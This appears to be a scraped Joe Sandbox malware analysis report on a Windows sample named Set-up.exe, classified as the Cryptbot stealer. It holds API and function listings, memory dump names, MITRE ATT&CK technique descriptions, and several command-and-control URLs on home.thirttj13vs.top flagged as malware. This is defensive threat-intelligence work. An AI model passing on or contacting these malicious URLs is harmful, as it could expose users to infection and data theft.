
Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00C8F9BB,00000000,00C95F07,?,?,00C8F9BB,?), ref: 01004266
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00C8F9BB,00000000,00C95F07,?,?,00C8F9BB,?), ref: 0100427A
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00C8F9BB,00000000,00C95F07,?,?,00C8F9BB,?), ref: 01004285
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00C8F9BB,00000000,00C95F07,?,?,00C8F9BB,?), ref: 01004290

Memory Dump Source

Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 25ffd014e2f6ed68e05ae34b745ed91c47a2600365e3d824e6176cbd5d9e1e58
Instruction ID: d1a8b848e9fa7eafc5d7729924882f05905aba995e10c4a161cb02d5c81f1413
Opcode Fuzzy Hash: 25ffd014e2f6ed68e05ae34b745ed91c47a2600365e3d824e6176cbd5d9e1e58
Instruction Fuzzy Hash: 5E01A276A002018FFA62AB58E44094BB7D4AFA0220F0AC47AD5C5CB2A1D630E8408B81

Source: http://home.thirttj13vs.top/jhkNTMUXVuSQJmAfrHzR1736163221fd4	Avira URL Cloud: Label: malware
Source: http://home.thirttj13vs.top/jhkNTMUXVuSQJmAfrHzR1736163221http://home.thirttj13vs.top/jhkNTMUXVuSQJm	Avira URL Cloud: Label: malware
Source: http://home.thirttj13vs.top/jhkNTMUXVuSQJmAfrHzR1736163221?argument=0	Avira URL Cloud: Label: malware
Source: home.thirttj13vs.top	Avira URL Cloud: Label: malware
Source: indohome.thirttj13vs.top	Avira URL Cloud: Label: malware
Source: http://home.thirttj13vs.top/jhkNTMUXVuSQJmAfrHzR1736163221	Avira URL Cloud: Label: malware

Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_01008E90 Sleep,_open,_exit,_write,_close,CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,CryptReleaseContext,	0_2_01008E90
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_01153F30 GetVersion,CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,GetLastError,__acrt_iob_func,_time32,GetLastError,__acrt_iob_func,	0_2_01153F30
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00EBF6E0 wcscmp,CryptAcquireContextW,CryptGetUserKey,GetLastError,GetLastError,CryptReleaseContext,	0_2_00EBF6E0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00EC1B40 MultiByteToWideChar,MultiByteToWideChar,CryptAcquireContextW,CryptGetProvParam,CryptGetProvParam,CryptGetProvParam,GetLastError,GetLastError,CryptReleaseContext,GetLastError,CryptReleaseContext,	0_2_00EC1B40
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00EC1F10 MultiByteToWideChar,MultiByteToWideChar,CryptAcquireContextW,CryptReleaseContext,GetLastError,	0_2_00EC1F10

Source: C:\Users\user\Desktop\Set-up.exe	Code function: -----BEGIN PUBLIC KEY-----		0_2_00CADCF0
Source: Set-up.exe	Binary or memory string: -----BEGIN PUBLIC KEY-----

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers. Root certificates are used in public key cryptography to identify a root certificate authority (CA). When a root certificate is installed, the system or application will trust certificates in the root's chain of trust that have been signed by the root certificate.Certificates are commonly used for establishing secure TLS/SSL communications within a web browser. When a user attempts to browse a website that presents a certificate that is not trusted an error message will be displayed to warn the user of the security risk. Depending on the security settings, the browser may not allow the user to establish a connection to the website.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Set-up.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Cryptbot

Yara Signatures

Memory Dumps

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Malware Analysis System Evasion

Anti Debugging

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Authenticode Signature

Entrypoint Preview

Data Directories

Sections

Imports

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTP Packets

Windows Analysis Report
Set-up.exe

Function 00C829FF Relevance: 63.3, APIs: 20, Strings: 16, Instructions: 321
stringprocessregistryCOMMON

Function 00C8255D Relevance: 47.5, APIs: 13, Strings: 14, Instructions: 282
filestringCOMMON

Function 00D4AA30 Relevance: 19.9, APIs: 13, Instructions: 364
networkCOMMON

Function 00C8116C Relevance: 19.7, APIs: 13, Instructions: 200
sleepstringCOMMON

Function 01008E90 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 121
COMMON

Function 01153F30 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 97
COMMON

Function 00C905B0 Relevance: 16.1, APIs: 8, Strings: 1, Instructions: 369
networkCOMMON

Function 00C96FA0 Relevance: 13.8, APIs: 9, Instructions: 255
sleepCOMMON

Function 00D49740 Relevance: 34.0, APIs: 12, Strings: 7, Instructions: 736
registrystringCOMMON

Function 00E5E5D0 Relevance: 19.6, APIs: 13, Instructions: 107
filestringCOMMON

Function 00CB8B50 Relevance: 19.5, APIs: 6, Strings: 5, Instructions: 263
networkCOMMON

Function 00C82F17 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 144
registryCOMMON

Function 00C876A0 Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 69
networkCOMMON

Function 00E047B0 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 95
stringCOMMON

Function 00C87770 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 69
networkCOMMON